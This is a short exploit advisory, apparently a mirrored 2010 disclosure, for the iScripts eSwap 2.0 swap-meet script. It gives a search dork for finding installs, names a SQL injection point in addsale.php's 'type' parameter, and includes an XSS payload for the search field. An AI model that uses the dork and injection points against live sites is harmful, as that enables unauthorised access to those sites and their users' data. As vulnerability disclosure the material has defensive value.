iScripts eSwap 2.0 – SQL Injection / Cross-Site Scripting

  • 作者: Sid3^effects
    日期: 2010-06-06
  • 类别:
  • 来源:
  • # Title:iScripts eSwap v2.0 sqli and xss vulnerability
    # Author: Sid3^effects 
    # Published: 2010-06-05
    # price:$99.95
    # vendor: iScripts
    # url :
    # google dork : Powered by iScripts eSwap. 
    ooooo.oooooo.oooooo oooooo oooo
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    o888o `Y8bood8P' `8'`8' 
    #####################Sid3^effects aKa HaRi##################################
    #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
    #Thanks:*L0rd ÇrusAdêr*,d4rk-blu?®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
    #spl shoutz:LiquidWorm,gunslinger_ :D 
    #Catch us at or
    Description : 
    iScripts eSwap enables you to create an virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users to swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through , Paypal, 2checkout and Google checkout are supported. Also offline payment methods are supported. The powerful admin section allows you to have multiple categories, sub categories and control every aspects of the business. This exchange platform is the ultimate green business by helping your users to recycle
    Sql injection and XSS is found in the eswap script V2.0
    Xploit :\m/sqli \m/
     demo : http://[site]/eswap/demo/addsale.php?type=[Sqli]
    Xploit: \m/ Xss \m/
    XSS is found in search field :D
     Attack pattern : '"--><script>alert(0x000872)</script>
     demo :http://[site]/eswap/demo/search.php